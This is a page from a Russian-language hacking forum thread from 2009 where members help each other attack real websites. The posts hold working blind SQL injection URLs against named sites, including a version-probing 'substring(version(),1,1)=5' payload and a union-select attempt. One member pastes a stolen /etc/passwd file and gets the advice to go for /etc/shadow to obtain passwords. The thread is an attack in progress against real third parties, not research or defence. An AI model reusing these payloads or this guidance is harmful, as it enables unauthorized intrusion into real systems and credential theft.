HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 867 из 2438 « Первая < 367767817857 863 864 865 866 867 868 869 870 871 87791796713671867 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #8661  
Старый 25.08.2009, 12:07
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
С нами: 9431076

Репутация: 229
По умолчанию
Цитата:
Сообщение от [x60]unu  
можно т.к времени крутить сейчас нет скину просто слепую
http://www.royalgroup.it/ita/offerte_speciali.htm?id_prodotto_sel=64/**/aNd/**/substring(version(),1,1)=5--&id_albergo=1179

Попробуй покрутить blind sql т.к стоит некая фильтрация запроса я так понял что union+select
ничего не происходит, перебрасывает лишь на verticalbooking.com, причем при любых значениях...
 
Ответить с цитированием

  #8662  
Старый 25.08.2009, 13:15
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами: 10024314

Репутация: 739
По умолчанию
Цитата:
http://www.royalgroup.it/modulo_eventi_gruppo/6242_Offerta_Speciale_Meeting_a_Napoli.htm?id_sezi one=6394+and+substring(version(),1,1)=5
Вот тут работает,5ая ветка.
 
Ответить с цитированием

  #8663  
Старый 25.08.2009, 13:49
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию
http://www.advantage.am/newsArticle.aspx?id=95'a

a 4to taoe eto?? s nim 4tota zdelat mojno??[I]
 
Ответить с цитированием

  #8664  
Старый 25.08.2009, 14:59
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами: 10024314

Репутация: 739
По умолчанию
Это не MSSQL:
Цитата:
Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082
 
Ответить с цитированием

  #8665  
Старый 25.08.2009, 15:45
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию
a 4to mojno zdelat??[I]
 
Ответить с цитированием

  #8666  
Старый 25.08.2009, 16:31
Komyak
Участник форума
Регистрация: 15.01.2009
Сообщений: 158
С нами: 9116253

Репутация: 26
По умолчанию
Проблема глупая, но ещё не сталкивался. Стянул с хоста файл- "passwd" соответственно в нём логины такого вида

Цитата:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
test:x:0:0:test:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
И перечисляются все пользователи. А теперь глупый вопрос- пароли только подбирать или они на хосте где-то валяются?
 
Ответить с цитированием

  #8667  
Старый 25.08.2009, 16:49
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами: 9798146

Репутация: 1224


По умолчанию
Цитата:
Сообщение от Komyak  
Проблема глупая, но ещё не сталкивался. Стянул с хоста файл- "passwd" соответственно в нём логины такого вида



И перечисляются все пользователи. А теперь глупый вопрос- пароли только подбирать или они на хосте где-то валяются?
/etc/shadow
 
Ответить с цитированием

  #8668  
Старый 25.08.2009, 18:26
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию
Цитата:
Сообщение от it's my  
/etc/shadow
только если ты не руут то врятли получиш к ним доступ
 
Ответить с цитированием

  #8669  
Старый 25.08.2009, 18:30
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами: 9798146

Репутация: 1224


По умолчанию
Цитата:
Сообщение от HAXTA4OK  
только если ты не руут то врятли получиш к ним доступ
на вопрос ответил, и ладно.
 
Ответить с цитированием

  #8670  
Старый 26.08.2009, 13:57
bleeep
Новичок
Регистрация: 01.02.2009
Сообщений: 5
С нами: 9090527

Репутация: 0
По умолчанию
Помогите разобраться, пытаюсь провести инъекцию но не могу определить количество полей сделал запрос вот такой www.sait.ru/profile.php?id=-1+union+select+1-- выдал вот такую ошибку
Цитата:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.`st_id` = `ff_users`.`st_id` AND `ff_status`.`lng_id` = 1' at line 55 file:/var/www/site.ru/profile.php line:186
Пытался перебирать поля дошел до 30 и все равно тоже самое((((Help me((
 
Ответить с цитированием
Ответ
Страница 867 из 2438 « Первая < 367767817857 863 864 865 866 867 868 869 870 871 87791796713671867 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.